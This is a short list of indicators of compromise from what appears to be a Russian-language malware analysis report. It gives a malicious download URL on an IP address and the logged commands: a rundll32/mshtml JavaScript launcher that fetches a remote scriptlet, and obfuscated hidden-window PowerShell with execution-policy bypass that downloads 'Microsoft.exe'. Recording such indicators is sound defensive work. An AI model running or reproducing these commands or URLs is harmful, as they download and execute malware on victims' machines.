Техническая информация
- https://84.16.248.175/downloads/microsoft.exe
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://84.##.248.175/downloads/runme');
- '84.##.248.175':443
- http://84.##.248.175/downloads/runme
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://84.##.248.175/downloads/runme');' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C powersHeLL.exE -ex bYpaSs -nop -W 1 seT-contenT -vA ( NEw-obJeCT NET.wEbcliENT ).dOwNlOADdaTa( 'https://84.16.248.175/downloads/Microsoft.exe' ) -en BYte -Pa...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C powersHeLL.exE -ex bYpaSs -nop -W 1 seT-contenT -vA ( NEw-obJeCT NET.wEbcliENT ).dOwNlOADdaTa( 'https://84.16.248.175/downloads/Microsoft.exe' ) -en BYte -Pa...